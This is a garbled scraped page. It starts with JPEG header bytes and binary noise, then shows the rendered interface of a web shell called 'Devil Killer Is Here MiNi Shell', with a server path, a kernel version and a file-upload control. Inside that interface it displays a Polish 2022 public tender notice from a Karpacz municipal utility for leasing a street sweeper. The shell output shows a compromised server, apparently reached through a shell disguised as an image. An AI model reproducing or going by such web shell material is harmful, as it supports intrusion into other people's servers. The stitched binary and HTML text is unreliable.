JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221114/0043765901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Zakup i dostawa fabrycznie nowej zamiatarki z pługiem dwulemieszowym w formie leasingu operacyjnego” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;MIEJSKI ZAKŁAD GOSPODARKI KOMUNALNEJ&#34; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 022269127</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Obrońców Pokoju 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karpacz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">58-540</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">757619431</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mzgk-karpacz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.mzgk-karpacz.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka komunalna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Usługi komunalne, gospodarka wodna i ściekowa oraz gospodarka mieszkaniowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Zakup i dostawa fabrycznie nowej zamiatarki z pługiem dwulemieszowym w formie leasingu operacyjnego” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0bffc035-641e-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00437659</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.mzgk-karpacz.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAP<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej, email: sekretariat@mzgk-karpacz.pl. Adres elektronicznej skrzynki<br/>podawczej zamawiającego (ePUAP): /mzgkkarpacz/SkrytkaESP, https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział<br/>w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP<br/>ma dostęp do for-mularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w<br/>Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/Instrukcje oraz Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego<br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, dalej „RODO”, informujemy, że:<br/>1. Administratorem Twoich danych osobowych (w skrócie ADO) będzie Miejski Zakład Gospodarki Komunalnej sp. z o.o. z siedzibą<br/>w Karpaczu, dane kontaktowe ADO: Karpacz (58-540), ul. Obroń-ców Pokoju 2a, e-mail: sekretariat@mzgk-karpacz.pl.<br/>2. Dane będą przetwarzane:<br/>• aby wypełnić obowiązki prawne związane z prowadzonym postępowaniem o udzielenie za-mówienia publicznego, wynikające z<br/>ustawy Prawo zamówień publicznych oraz przepisów do niej wykonawczych, zgodnie z art. 6 ust. 1 lit. c RODO,<br/>• aby zrealizować umowę (w przypadku jej zawarcia), zgodnie z art. 6 ust. 1 lit. b RODO oraz wypełnić obowiązki prawne związane z<br/>umową, wynikające w szczególności z przepisów prawa rachunkowego i podatkowego, zgodnie z art. 6 ust. 1 lit. c RODO,<br/>• aby zrealizować prawnie uzasadniony interes ADO, jakim jest dochodzenie lub obrona przed roszczeniami związanymi z<br/>prowadzonym postępowaniem o udzielenie zamówienia publicz-nego oraz umową (w przypadku jej zawarcia), zgodnie z art. 6 ust. 1<br/>lit. f RODO.<br/>3. Podanie danych osobowych jest niezbędne, aby wziąć udział w postępowaniu o udzielenie zamó-wienia publicznego.<br/>4. Twoje dane będą przekazywane:<br/>• podmiotom, które na zlecenie ADO wykonują czynności wspierające jego działalność, np. fir-my serwisujące systemy informatyczne<br/>ADO (w szczególności M. Informatyka sp. z o.o. sp. kom. z siedzibą w Mysłowicach (41-400), przy ul. Modrzewskiego 42), dostawcy<br/>usługi ho-stingu poczty elektronicznej (w szczególności home.pl S.A. z siedzibą w Szczecinie (70-653), przy ul. Zbożowej 4),<br/>• podmiotom/osobom upoważnionym do ich przetwarzania na podstawie przepisów prawa.<br/>5. Twoje dane zebrane w celu realizacji obowiązków prawnych będą przechowywane przez okres wskazany w przepisach prawa, w<br/>szczególności w ustawie Prawo zamówień publicznych, a w przy-padku zawarcia umowy również przez okres wynikający z prawa<br/>rachunkowego i podatkowego. Dane przetwarzane w celu realizacji prawnie uzasadnionego interesu ADO będą przechowywane do<br/>czasu upływu potencjalnych roszczeń lub uwzględnienia zgłoszonego sprzeciwu.<br/>6. Twoje dane osobowe nie będą wykorzystywane przez ADO do podejmowania wobec Ciebie decy-zji w sposób zautomatyzowany<br/>(czyli bez udziału człowieka), w tym do profilowania.<br/>7. Przysługuje Ci prawo do:<br/>• dostępu do Twoich danych osobowych, przy czym, gdyby zrealizowanie tego obowiązku przez ADO wymagałoby niewspółmiernie<br/>dużego wysiłku, ADO może żądać od Ciebie, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania/zakończonego postępowania o udzielenie zamówienia publicznego,<br/>• sprostowania danych - jeśli są nieprawidłowe lub niekompletne, przy czym skorzystanie z tego prawa nie może skutkować zmianą<br/>wyniku postępowania o udzielenie zamówienia publiczne-go, zmianą postanowień umowy w zakresie niezgodnym z ustawą Prawo<br/>zamówień publicz-nych, ani naruszać integralności protokołu oraz jego załączników,<br/>• usunięcia danych (w określonych przypadkach),<br/>• ograniczenia przetwarzania danych (w określonych przypadkach), przy czym skorzystanie z tego prawa nie ogranicza<br/>przetwarzania Twoich danych osobowych do czasu zakończenia po-stępowania o udzielenie zamówienia publicznego,<br/>• wniesienia do ADO sprzeciwu wobec przetwarzania Twoich danych osobowych z uwagi na Twoją<br/>szczególną sytuację (dotyczy danych przetwarzanych w celu realizacji prawnie uzasadnionego interesu ADO),<br/>• przenoszenia Twoich danych osobowych (pod określonymi warunkami),<br/>• wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/3/2022-P</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 4.1.	Przedmiot zamówienia obejmuje dostawę do siedziby Zamawiającego (Karpacz 58-540, ul. Obrońców Pokoju 2a, woj. Dolnośląskie, Polska) i sfinansowanie w formie leasingu operacyjnego fabrycznie nowej zamiatarki z pługiem dwulemieszowym. Zamiatarka wraz z osprzętem musi być fabrycznie nowa, produkowana seryjnie (a nie przygotowana jedynie dla potrzeb tego postępowania).<br/>	Rok produkcji - nie starszy niż 2022<br/>	Zamiatarka podciśnieniowa z układem recyrkulacji wody<br/>	DMC – do 3,5 tony <br/>	Konstrukcja przegubowa<br/>	Wymiary zamiatarki wraz z zespołem zamiatającym dwu szczotkowym:<br/>o	Wysokość – maksymalnie - 2000 mm ( bez światła sygnalizacyjnego )<br/>o	Szerokość – maksymalnie - 1300 mm ( szerokość nośnika narzędzi )<br/>o	Długość – maksymalnie - 4600 mm<br/>	Rozstaw osi – maksymalnie 1800 mm – kryterium oceny oferty<br/>	Podwozie 4 kołowe, napęd hydrostatyczny na 4 koła<br/>	Wysokość pokonywania krawężników – minimum 150 mm<br/>	Pojazd wolnobieżny nie wymagający rejestracji<br/>	Minimalna prędkość transportowa – 25 km/h<br/>	Dokumenty umożliwiające poruszanie się pojazdu po drogach publicznych<br/>	Rozmiar opon min R 16 M+S<br/>	Silnik Diesel – moc minimalna – 55 kW <br/>	Emisja spalin – minimum Stage V<br/>	Kabina zamknięta, oszklona, ogrzewana i klimatyzowana, radioodbiornik<br/>	Siedzenie umieszczone centralnie, zawieszone pneumatycznie lub hydraulicznie, regulowane<br/>	Kolor - intensywny pomarańcz ( kolor ogólnie uznany za kolor maszyn komunalnych )<br/>	Podgrzewane lusterka<br/>	Oświetlenie LED zgodne z przepisami prawo o ruchu drogowym<br/>	Światło i akustyczny sygnał cofania<br/>	Poziom ciśnienia akustycznego (LpA) zgodnie z dyrektywą 2006/42/WE i zgodnie z normą DIN EN ISO 11201 w normalnych warunkach pracy przy 1600 obr./min - max - 72 dB(A)<br/>	Zespół zamiatający dwu szczotkowy – regulacja szczotek z kabiny operatora w zakresie: sze-rokość zamiatania, niezależne wychylenie mierzone od osi pojazdu w płaszczyźnie poziomej każdej ze szczotek, prędkości obrotowej (funkcja dodatkowa) - kryterium oceny oferty <br/>	Szerokość zamiatania – co najmniej - 2200 mm<br/>	Średnica szczotek – co najmniej 850 mm<br/>	Średnica zawracania pomiędzy krawężnikami – maksymalnie 6000 mm – kryterium oceny oferty<br/>	System szybkiej zmiany narzędzi, dotyczy narzędzi montowanych z przodu jak i z tyłu pojaz-du, bez konieczności użycia kluczy lub innych narzędzi <br/>	Szerokość dyszy ssącej – co najmniej 500 mm<br/>	Średnica kanału ssącego – co najmniej 180 mm, kanał ssący zamontowany na pojeździe w linii prostej od dyszy ssącej do wyrzutu w zbiorniku, w taki sposób, aby w pozycji roboczej nie wystawał poza obrys pojazdu, brak konieczności demontażu kanału ssącego przy wykorzysta-niu pojazdu do prac zimowych (pług, posypywarka)<br/>	Klapa dużych śmieci sterowana z kabiny operatora<br/>	Możliwość obserwacji dyszy ssącej z kabiny kierowcy<br/>	Zbiornik na nieczystości – minimum 1500 litrów pojemności nominalnej zgodnie z EN 15429, ( potwierdzenie ) wykonany z materiału odpornego na korozję i ścieranie, kiprowanie hydrau-liczne,<br/>	Wysokość opróżniania zbiornika minimum 1400 mm<br/>	Wąż do grawitacyjnego spuszczania wody ze zbiornika na nieczystości<br/>	Ładowność zbiornika zamiatarki – co najmniej 1000 kg<br/>	Zbiornik wody czystej – minimum 180 litrów<br/>	Przyłącze do hydrantu do napełniania zbiornika wody czystej<br/>	Ręczny wąż ssawny teleskopowy: długość minimum 3,5 m, średnica minimum 125 mm, ( do-stosowany do pracy po obu stronach maszyny, z uchwytem, chowany po zakończeniu pracy )<br/>	Myjka wysokociśnieniowa montowana z tyłu pojazdu, wydajność min. 10 l/min; 100 bar, wy-posażona w pistolet ręczny natryskowy z wężem min. 10 m.<br/>	Certyfikat PM 2,5; PM 10 – potwierdzenie EUnited ( certyfikat )<br/>	Gwarancja co najmniej 36 miesięcy licząc od daty podpisania bezusterkowego protokołu od-bioru przedmiotu umowy.<br/>	Bezpłatne przeszkolenie dwóch wskazanych przez Zamawiającego pracowników w zakresie obsługi i konserwacji przedmiotu zamówienia<br/>	Termin dostawy – 30 dni – kryterium oceny oferty<br/>	Pług odśnieżny dwulemieszowy – szerokość 145 – 160 cm, wysokość 60 – 80 cm<br/>	Dodatkowa para szczotek mieszanych<br/>	Możliwość współpracy z następującym osprzętem: (nie jest wymagana dostawa):<br/>o	Urządzenie do szorowania na mokro z odsysaniem i recyrkulacją wody brudnej, listwa zbierająca pomiędzy szczotkami a kołami pojazdu, szerokość robocza ca najmniej 1200 mm<br/>o	Możliwość holowania przyczepy o DMC co najmniej 2000 kg<br/>o	Urządzenie do ciśnieniowego spłukiwania i podlewania o pojemności co najmniej 1200 litrów, ciśnienie co najmniej 6 barów, wydajność co najmniej 60 litrów na minutę, wąż co najmniej 30 metrów<br/>	Informacje dodatkowe:<br/>o	Reakcja serwisu gwarancyjnego do 3 dni roboczych od momentu zgłoszenia <br/>o	Wykonawca zobowiązany jest dostarczyć w dniu przekazania przedmiotu zamówienia:<br/>	instrukcję w języku polskim<br/>	katalog części zamiennych w formie obrazkowo numerycznej jako katalog książkowy bądź w formie elektronicznej, na nośniku cyfrowym lub na portalu Dostawcy,<br/>	kartę gwarancyjną<br/>	certyfikat PM 2,5; PM10<br/>4.2.	Wymagania dotyczące leasingu operacyjnego:<br/>4.2.1.	Okres trwania umowy: 48 miesięcy <br/>	Forma leasingu: operacyjny;<br/>	Waluta leasingu: PLN;<br/>	Opłata wstępna: 5%;<br/>	Opłata końcowa: 20%;<br/>	Oprocentowanie stałe na cały okres trwania umowy;<br/>	Nie przewiduje się żadnych dodatkowych kosztów po stronie Zamawiającego, w szczególności opłat manipulacyjnych, kosztów transportu czy opłat rejestracji pojazdu;<br/>4.2.2.	Zamawiający akceptuje Tabele Opłat i Prowizji obowiązujące u finansującego.<br/>4.2.3.	Zamawiający wyraża zgodę na zawarcie umowy leasingu i ogólnych warunków umowy leasingowej na wzorze stosowanym przez finansującego z zastrzeżeniem, że postanowienia zawarte w SWZ zostaną uwzględnione w umowie leasingowej. Wykonawca załączy do oferty wzór umowy leasingu wraz z ogólnymi warunkami leasingu.<br/>4.2.4.	Wykonawca nie będzie żądał zabezpieczenia umowy leasingu w postaci weksla In blanco.<br/>4.2.5.	Koszty ubezpieczenia OC, AC i NNW leżą po stronie Zamawiającego. Zamawiający będzie zobowiązany przedstawić Wykonawcy coroczne polisy OC, AC i NNW. <br/>4.3.	Nazwy i kody przedmiotu zamówienia określone we Wspólnym </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34921100-0 - Zamiatarki drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rozstaw osi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zespół zamiatający</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Średnica zawracania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 5</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wykonawca zobowiązany jest wykazać się doświadczeniem w wykonaniu, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniu, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jednej usługi, której przedmiotem była/jest dostawa pojazdu w formie leasingu, jak stanowiący przedmiot zamówienia lub podobnych, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których dostawy zostały wykonane o wartości minimum 300 000,00 zł brutto w ramach jednego postępowania przetargowego – poświadczone referencjami. W przypadku wskazania usługi wykonywanej (trwającej), należy wskazać zakres i wartość usługi faktycznie zrealizowaną w celu potwierdzenie spełnienia warunku. Zamawiający nie dopuszcza aby wykaz dotyczył usług wykonanych, a przypadku świadczeń okresowych lub ciągłych – również wykonywanych, w okresie dłuższym niż 3 lata przed upływem terminu składania ofert. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z postępowania na okoliczności, o których mowa w art. 108 ust 1. oraz w art. 109<br/>ust. 1 pkt. 4 u.p.z.p.<br/>a) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 u.p.z.p., w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego – zgodnie z treścią załącznika nr 6 do SWZ.<br/>b) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 u.p.z.p. o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t. j. Dz.U. z 2021 r., poz. 275) z innym<br/>Wykonawcą, który złożył od-rębną ofertę albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy<br/>kapitałowej – zgodnie z treścią załącznikiem nr 7 do SWZ.<br/>c) Odpis lub informacja z Krajowego Rejestru Sądowego lub z centralnej ewidencji i informacji o działalności gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4) ustawy sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji.<br/>d) Zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego<br/>Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie<br/>społeczne lub zdrowotne, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, 